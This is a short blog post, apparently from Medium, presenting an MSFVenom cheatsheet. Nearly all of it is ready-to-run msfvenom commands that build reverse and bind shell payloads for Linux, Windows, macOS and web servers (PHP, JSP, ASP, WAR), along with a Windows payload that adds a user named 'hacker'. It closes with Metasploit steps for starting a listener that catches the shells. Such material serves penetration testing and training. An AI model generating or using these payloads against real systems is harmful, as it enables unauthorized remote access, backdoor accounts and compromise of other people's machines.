Open in app

Sign in

Write

Sign in

MSFVenom Cheatsheet

Andrew Long
2 min readOct 4, 2021

MSFVenom, if you’re not already familiar, is the payload creating cousin of Metasploit. With it, you can create a wide variety of shellcodes, reverse tcp connectors, and much more. I’ll leave the full explanation for another article, as I’m sure you probably know the basics if you’re here. This command cheatsheet should be all you need to get started dropping shells.

Commands

List available payloads
msfvenom -l payloadsList payload options
msfvenom -p PAYLOAD --list-optionsMeterpreter reverse shell x86 multi stage
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinuxLinux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux bind shell x64 single stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux reverse shell x64 single stage
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elfWindows Meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows Meterpreter bind shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exeWindows CMD Multi Stage
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows CMD Single Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows add user
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exeMac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.machoMac Bind shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.machoPython Shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.pyBASH Shell
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.shPERL Shell
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.plASP Meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.aspJSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp WAR Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war Php Reverse Shell
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php

Bonus

Additionally, here is an example of how to start a listener through metasploit.

root@kali: msfconsole -qmsf: use exploit/multi/handler
msf: set LHOST <your listening address>
msf: set LPORT <your listening port>
msf: set payload windows/shell/reverse_tcp <or relevant payload>
msf: run
Hacking
Metasploit
Msfvenom
Cybersecurity

--

--

Andrew Long

Written by Andrew Long

447 Followers

Principal Product Security Engineer @ Flock Saftey. Avid security researcher, dedicated father, and nerdy analog electronics collector.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams